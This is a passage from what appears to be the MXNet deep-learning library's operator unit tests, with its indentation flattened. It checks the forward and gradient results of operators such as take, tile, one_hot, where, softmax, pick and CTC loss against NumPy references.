elif axis == 3:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, :, idx] += 1.0
else:
grad_in[:, :, :, idx, :] += 1.0
elif axis == 4:
grad_in[:, :, :, :, idx] += 1.0
else:
raise ValueError("axis %d is not supported..." % axis)
def check_output_n_grad(data_shape, idx_shape, axis, mode):
data = mx.sym.Variable('a')
idx = mx.sym.Variable('indices')
idx = mx.sym.BlockGrad(idx)
result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
exe = result.simple_bind(default_context(), a=data_shape,
indices=idx_shape, axis=axis, mode=mode)
data_real = np.random.normal(size=data_shape).astype('float32')
idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
if axis < 0:
axis += len(data_shape)
grad_out = np.ones((data_shape[0:axis] if axis > 0 else ()) + idx_shape + (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()), dtype='float32')
grad_in = np.zeros(data_shape, dtype='float32')
exe.arg_dict['a'][:] = mx.nd.array(data_real)
exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0].asnumpy(), np.take(data_real, idx_real, axis=axis, mode=mode))
for i in np.nditer(idx_real):
grad_helper(grad_in, axis, i)
exe.backward([mx.nd.array(grad_out)])
assert_almost_equal(exe.grad_dict['a'].asnumpy(), grad_in)
def check_autograd_req():
row_len = 2
col_len = 8
shape = (row_len, col_len)
sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
sc.attach_grad()
i = mx.nd.array([0], dtype="int64")
j = mx.nd.array([0], dtype="int64")
with mx.autograd.record(train_mode=True):
xs = []
for _ in range(row_len):
x_i = []
for _ in range(col_len):
x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
x_i.append(x_ij)
j = j + 1
i = i + 1
j = j - col_len # reset j
xs.append(mx.nd.stack(*x_i))
x = mx.nd.stack(*xs)
x = x.sum()
x.backward()
assert_almost_equal(np.ones(sc.grad.shape), sc.grad.asnumpy())
for mode in ['clip', 'wrap']:
for data_ndim in range(1, 5):
for idx_ndim in range(1, 4):
for axis in range(-data_ndim, data_ndim):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=1, high=5), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=1, high=5), )
check_output_n_grad(data_shape, idx_shape, axis, mode)
check_autograd_req()
@with_seed()
def test_grid_generator():
# transform_type = affine
test_case = [(20,21),(4,3),(6,12),(15,17)]
for target_shape in test_case:
affine_matrix = mx.sym.Variable('affine')
grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='write')
# check forward
exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
tmp = np.zeros((3,target_shape[0]*target_shape[1]))
tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
tmp[2] = 1
grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
assert_almost_equal(exe.grad_dict['affine'].asnumpy(), grad_est, rtol=1e-3, atol=1e-5)
# check addto
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='add')
grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
exe.grad_dict['affine'][:] = grid_grad_npy
exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['affine'].asnumpy(), grad_est + grid_grad_npy, rtol=1e-2, atol=1e-5)
# transform_type = warp
test_case = [(12,21),(4,3),(6,12)]
for target_shape in test_case:
flow = mx.sym.Variable('flow')
grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), flow=(1,2)+target_shape, grad_req='write')
# check forward
exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
grad_est = np.zeros((1,2)+target_shape)
grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
assert_almost_equal(exe.grad_dict['flow'].asnumpy(), grad_est, rtol=1e-3)
# check addto
exe_add = grid.simple_bind(ctx=default_context(), flow=(1, 2) + target_shape, grad_req='add')
flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
exe_add.grad_dict['flow'][:] = flow_grad_npy
exe_add.forward(is_train=True)
exe_add.backward(mx.nd.array(out_grad))
assert_almost_equal(exe_add.grad_dict['flow'].asnumpy(), grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
@with_seed()
def test_index2d():
for _ in range(30):
n = np.random.randint(1, 100)
m = np.random.randint(1, 500)
data = mx.random.uniform(-1, 1, shape=(n, m), ctx=default_context())
x = mx.nd.array(np.random.randint(0, m, size=n), ctx=default_context(), dtype='int32')
r = mx.nd.batch_take(data, x)
assert_almost_equal(r.asnumpy(), data.asnumpy()[np.arange(n), x.asnumpy()])
@with_seed()
def test_cast():
for srctype in [np.int32, np.float32, np.float16]:
for dsttype in [np.float32, np.int32, np.float16]:
x = mx.sym.Variable('x', dtype=srctype)
y = mx.sym.Cast(x, dtype=dsttype)
exe = y.simple_bind(ctx=default_context(), x=(10, 10))
assert exe.arg_arrays[0].dtype == srctype
assert exe.outputs[0].dtype == dsttype
X = np.random.uniform(-10, 10, size=(10, 10))
exe.arg_arrays[0][:] = X
exe.forward(is_train=True)
exe.backward(mx.nd.array(X, dtype=dsttype, ctx=default_context()))
assert_almost_equal(exe.outputs[0].asnumpy(), X.astype(srctype).astype(dsttype), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_arrays[0].asnumpy(), X.astype(dsttype).astype(srctype), rtol=1e-3, atol=1e-5)
# Test requires all platforms to round float32->float16 with same round-to-nearest-even policy.
@with_seed()
def test_cast_float32_to_float16():
FP16_FRACTION_BITS = 10
FP32_FRACTION_BITS = 23
FP32_EXP_MIN = -126
FP32_EXP_MAX = 127
# generate test cases in the vicinity of representable float16 mantissas
# and mid-way between them, but over the full range of float32 exponents.
def get_data():
for sign_bit in [0, 1]:
for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
denominator = 2**(FP16_FRACTION_BITS + 1)
for numerator in range(0, denominator):
fraction = numerator / float(denominator)
for y in [-1.0, 0.0, 1.0]:
small_delta = y / 2**FP32_FRACTION_BITS
val = (-1.0)**sign_bit * 2.0**exponent * (1.0 + fraction + small_delta)
yield val
# Add np.nan as a final data value to process
yield np.nan
input_np = np.array(list(get_data())).astype(np.float32)
# The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
# as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
expected_output = input_np.astype(np.float64).astype(np.float16)
x = mx.sym.Variable('x', dtype=np.float32)
sym = mx.sym.Cast(x, dtype=np.float16)
ctx = default_context()
exe = sym.bind(ctx, {'x' : mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
assert exe.arg_arrays[0].dtype == np.float32
assert exe.outputs[0].dtype == np.float16
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
@with_seed()
def test_repeat():
def test_repeat_forward():
ndim_max = 6 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
repeats = 3
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(0, ndim):
shape += (np.random.randint(1, size_max+1), )
a = np.random.random_sample(size=shape)
aa = np.repeat(a, repeats)
b = mx.nd.array(a, ctx=default_context())
bb = mx.nd.repeat(b, repeats).asnumpy()
assert_almost_equal(aa, bb)
for axis in range(0, ndim):
aa = np.repeat(a, repeats, axis)
bb = mx.nd.repeat(b, repeats, axis).asnumpy()
assert_almost_equal(aa, bb)
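    # Backward of repeat: each input element receives the sum of the output
    # gradients of its `repeats` copies along the repeated axis.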
def test_repeat_backward(axis):
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=axis)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
if axis == 0:
npout_grad = npout_grad.reshape(n1 * repeats, n2)
elif axis == 1:
npout_grad = npout_grad.reshape(n1, n2 * repeats)
else:
raise RuntimeError("Invalid axis value")
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
if axis == 0:
for i in range(shape[0]):
for j in range(shape[1]):
k = i * repeats
expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
elif axis == 1:
for j in range(shape[1]):
for i in range(shape[0]):
k = j * repeats
expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
else:
raise RuntimeError("Invalid axis value")
assert_almost_equal(expected_grad, arr_grad.asnumpy(), rtol=1e-3)
def test_repeat_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=0)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)
test_repeat_forward()
test_repeat_backward(axis=0)
test_repeat_backward(axis=1)
test_repeat_numeric_gradient()
@with_seed()
def test_reverse():
data = mx.symbol.Variable('data')
shape = (5, 5, 5)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.reverse(data, axis=[1, 2])
grad = np.random.uniform(-1, 1, shape)
check_numeric_gradient(test, [data_tmp], numeric_eps=2E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp[:, ::-1, ::-1]])
check_symbolic_backward(test, [data_tmp], [grad], [grad[:, ::-1, ::-1]])
@with_seed()
def test_tile():
def test_normal_case():
ndim_min = 1
ndim_max = 5 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
length_max = 3 # max length of reps
rep_max = 10 # max number of tiling in each dim
for ndim in range(ndim_min, ndim_max+1):
shape = []
for i in range(1, ndim+1):
shape.append(np.random.randint(1, size_max+1))
shape = tuple(shape)
a = np.random.randint(0, 100, shape)
b = mx.nd.array(a, dtype=a.dtype)
reps_len = np.random.randint(1, length_max+1)
reps_tuple = ()
for i in range(1, reps_len):
reps_tuple += (np.random.randint(1, rep_max), )
reps_array = np.asarray(reps_tuple)
a_tiled = np.tile(a, reps_array)
b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_tensor():
shape = (2, 3, 0, 4)
a = np.array([], dtype=np.int32).reshape(shape)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
reps = (2, 4, 6)
a_tiled = np.tile(a, reps)
b_tiled = mx.nd.tile(b, reps).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_reps():
a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
a_tiled = np.tile(a, ())
b_tiled = mx.nd.tile(b, ()).asnumpy()
assert same(a_tiled, b_tiled)
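    # Backward of tile: the input gradient at (i, j) is the sum of the output
    # gradient over all tiled copies of that element.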
def test_tile_backward():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
assert_almost_equal(expected_grad, arr_grad.asnumpy(), rtol=1e-3)
def test_tile_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)
def test_invalid_reps():
data = mx.nd.arange(16).reshape((4, 4))
assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))
test_normal_case()
test_empty_tensor()
test_empty_reps()
test_tile_backward()
test_tile_numeric_gradient()
test_invalid_reps()
@with_seed()
def test_one_hot():
def test_normal_case(index_type=np.int32):
ndim_max = 6
dim_size_max = 20
depth = int(dim_size_max / 2)
on_value = 1
off_value = 0
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(1, ndim+1):
shape += (np.random.randint(1, dim_size_max+1), )
indices = np.random.randint(-dim_size_max, dim_size_max+1,
size=np.prod(shape)).reshape(shape)
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=index_type),
depth=depth, dtype=np.int32)
expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
expected_array[:] = off_value
indices_1d = indices.flatten()
row = 0
for idx in indices_1d:
if 0 <= idx < depth:
expected_array[row, idx] = on_value
row += 1
expected_array = expected_array.reshape(shape + (depth, ))
one_hot_array = mx_one_hot_array.asnumpy()
assert same(expected_array, one_hot_array)
def test_empty_indices():
shape = (2, 0, 9, 3)
indices = np.array([]).reshape(shape)
depth = 10
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
def test_zero_depth():
shape = (2, 4, 9, 3)
indices = np.ones(shape)
depth = 0
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
test_normal_case(index_type=np.int32)
test_normal_case(index_type=np.float64)
test_normal_case(index_type=np.float32)
test_normal_case(index_type=np.float16)
test_empty_indices()
test_zero_depth()
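# test_where checks mx.sym.where with both an element-wise condition (same shape as
# x/y) and a 1-D per-row condition, covering forward results, explicit backward
# expectations, numeric gradients and invalid-shape errors.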
@with_seed()
def test_where():
def get_forward_expected_output(condition, x, y):
original_shape = x.shape
out = np.zeros(original_shape)
if condition.shape == x.shape:
for index, c in np.ndenumerate(condition):
if c != 0:
out[index] = x[index]
else:
out[index] = y[index]
elif condition.shape == (x.shape[0], ):
s = x.shape
m = s[0]
n = int(np.prod(s)/s[0])
x2d = x.reshape((m, n))
y2d = y.reshape((m, n))
out = out.reshape((m, n))
for i in range(0, m):
if condition[i] != 0:
for j in range(0, n):
out[i, j] = x2d[i, j]
else:
for j in range(0, n):
out[i, j] = y2d[i, j]
else:
raise RuntimeError("Invalid condition shape for where op")
out = out.reshape(original_shape)
return out
def get_forward_inputs_same_shape(shape):
condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_forward_inputs_condition_vector(shape):
condition_np = np.random.randint(0, 2, shape[0])
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_backward_input(shape):
return np.random.randint(20, 30, np.prod(shape)).reshape(shape)
def get_backward_expected_outputs(grad_in, condition):
shape = grad_in.shape
grad_cond = np.zeros(condition.shape)
grad_x = np.empty(shape)
grad_y = np.empty(shape)
for index, c in np.ndenumerate(condition):
if 0 != c:
grad_x[index] = grad_in[index]
grad_y[index] = 0
else:
grad_x[index] = 0
grad_y[index] = grad_in[index]
return grad_cond, grad_x, grad_y
def test_where_helper(shape, same_shape):
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
out_expected = get_forward_expected_output(condition_np, x_np, y_np)
grad_in_np = get_backward_input(shape)
grad_expected_cond, grad_expected_x, grad_expected_y\
= get_backward_expected_outputs(grad_in_np, condition_np)
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int32)
where_sym = mx.sym.where(condition, x, y)
# test req='write'
where_exe_write = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='write')
# test forward req='write'
outputs = where_exe_write.forward(is_train=True, condition=condition_np,
x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='write'
where_exe_write.backward(grad_in_mx)
assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
# test req='add'
x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
where_exe_add = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='add')
where_exe_add.grad_dict['x'][:] = x_grad_init
where_exe_add.grad_dict['y'][:] = y_grad_init
# test forward req='add'
outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='add'
where_exe_add.backward(grad_in_mx)
x_ograd = where_exe_add.grad_dict['x'].asnumpy()
y_ograd = where_exe_add.grad_dict['y'].asnumpy()
assert same(x_ograd, grad_expected_x+x_grad_init)
assert same(y_ograd, grad_expected_y+y_grad_init)
def test_where_numeric_gradient(shape, same_shape):
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])
def test_invalid_shape():
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
def test_1d_cond():
cond = mx.nd.array([1, 0, 1])
x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
expect_out = np.array([[2, 3], [9, 10], [6, 7]])
out = mx.nd.where(cond, x, y).asnumpy()
        assert (expect_out == out).all()
test_where_helper((5, 9), True)
test_where_helper((5, 9), False)
test_where_helper((5, 7, 9), True)
test_where_helper((5, 7, 9), False)
test_where_helper((10, 8, 15, 3), True)
test_where_helper((10, 8, 15, 3), False)
test_where_numeric_gradient((5, 9), True)
test_where_numeric_gradient((5, 9), False)
test_where_numeric_gradient((5, 7, 9), True)
test_where_numeric_gradient((5, 7, 9), False)
test_invalid_shape()
test_1d_cond()
@unittest.skip("Flaky test. Tracked in https://github.com/apache/incubator-mxnet/issues/13600")
@with_seed()
def test_softmin():
for ndim in range(1, 5):
for dtype in [np.float16, np.float32, np.float64]:
rtol, atol = (1e-2, 5e-3) if dtype is np.float16 else (1e-3, 1e-3)
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape).astype(dtype)
data = data / 10 if dtype is np.float16 else data
sym = mx.sym.softmin(axis=axis)
expected_fwd = np_softmax(-data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], atol=atol, dtype=dtype)
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=rtol, atol=atol, grad_req=req, dtype=dtype)
if dtype is not np.float16:
check_numeric_gradient(sym, [data], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_new_softmax():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.softmax(axis=axis)
expected_fwd = np_softmax(data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd])
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=1e-2, atol=1e-3, grad_req=req)
check_numeric_gradient(sym, [data], rtol=1e-2, atol=1e-3)
@with_seed()
def test_softmax_with_temperature():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
data = np.random.uniform(-2, 2, size=shape)
for temp in range(1, 11):
sym = mx.sym.softmax(axis=0, temperature=temp)
expected_fwd = np_softmax(data, axis=0, temperature=temp)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], rtol=0.05, atol=1e-3)
check_symbolic_backward(sym, [data], [np.ones(shape)], [expected_bwd], rtol=0.05, atol=1e-3)
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
@with_seed()
def test_log_softmax():
for ndim in range(1, 5):
for _ in range(5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(0, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.log_softmax(axis=axis-ndim)
check_symbolic_forward(sym, [data], [np.log(np_softmax(data, axis=axis)+1e-20)])
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
def test_softmax_with_large_inputs():
def softmax_forward(input_data, true_output):
data = mx.sym.Variable('data')
out1 = data.softmax(axis=1)
exec1 = out1.bind(default_context(), args={'data': input_data})
exec1.forward()[0].wait_to_read()
ndarr = exec1.outputs[0][0][0][0]
nparr = ndarr.asnumpy()
assert_almost_equal(nparr, true_output, rtol=1e-5, atol=1e-5)
softmax_forward(mx.nd.array([[[[-1e30,-1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[1e30,1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[-3.4e38,-3.4e38]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[3.4e38,3.4e38]]]]), np.array([1.0,1.0]))
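# test_softmax_dtype runs softmax/softmin/log_softmax on the same data in a low-precision
# dtype and a higher-precision reference dtype (optionally with an explicit output dtype)
# and requires outputs and input gradients to agree within the given tolerances.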
@with_seed()
def test_softmax_dtype():
def check_dtypes_almost_equal(op_name,
atol, rtol,
grad_atol, grad_rtol,
idtype, ref_dtype, odtype=None):
op = getattr(mx.nd, op_name)
input_data = mx.random.uniform(shape=(100, 500))
dtype_input = input_data.astype(idtype)
ref_input = input_data.astype(ref_dtype)
dtype_input.attach_grad()
ref_input.attach_grad()
with mx.autograd.record():
dtype_softmax = op(dtype_input, axis=-1, dtype=odtype)
ref_softmax = op(ref_input, axis=-1, dtype=odtype)
dtype_softmax_np = dtype_softmax.asnumpy()
ref_softmax_np = ref_softmax.asnumpy()
assert_almost_equal(dtype_softmax_np, ref_softmax_np, rtol=rtol, atol=atol)
dtype_softmax.backward()
ref_softmax.backward()
dtype_grad_np = dtype_input.grad.asnumpy()
ref_grad_np = ref_input.grad.asnumpy()
assert_almost_equal(dtype_grad_np, ref_grad_np, rtol=grad_rtol, atol=grad_atol)
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64', 'float64')
@with_seed()
def test_pick():
def test_pick_helper(index_type=np.int32):
for _ in range(100):
for mode in ['clip', 'wrap']:
ndim = np.random.randint(1, 5)
bshape = np.random.randint(1, 10, size=ndim)
axis = np.random.randint(0, ndim)
sshape = bshape.copy()
sshape[axis] = 1
data = np.random.uniform(-1, 1, size=bshape)
if mode == 'wrap':
index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
else:
index = np.random.randint(0, bshape[axis], size=sshape)
exp = []
for i in range(ndim):
if i == axis:
if mode == 'wrap':
exp.append(index % bshape[axis])
else:
exp.append(index)
else:
ishape = [1 for _ in range(ndim)]
ishape[i] = bshape[i]
exp.append(np.arange(bshape[i]).reshape(ishape))
expected = data[exp]
data = mx.nd.array(data, dtype='float32')
index = mx.nd.array(index, dtype=index_type)
out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
assert_almost_equal(out.asnumpy(), expected)
data_holder = data
index_holder = index
data = mx.sym.Variable('data')
index = mx.sym.Variable('index')
sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])
test_pick_helper(np.int32)
test_pick_helper(np.float32)
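# check_ctc_loss runs mx.sym.ctc_loss in training and inference mode, requires both
# losses to match (and to match a ground-truth value when supplied), and checks the
# gradient w.r.t. the activations numerically.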
def check_ctc_loss(acts, labels, loss_truth):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
ctc = mx.sym.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc.bind(ctx=default_context(), args=[acts_nd, labels_nd])
# test forward with grad calc
exe.forward(is_train=True)
    outTest = exe.outputs[0].copy()  # copy so the next forward() does not overwrite it
# test forward without grad calc
exe.forward(is_train=False)
outTrain = exe.outputs[0]
# make sure losses calculated with both modes are the same
assert_almost_equal(outTest.asnumpy(), outTrain.asnumpy())
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(outTest.asnumpy(), loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
# check contrib operator for backward compatibility
def check_contrib_ctc_loss(acts, labels, loss_truth):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
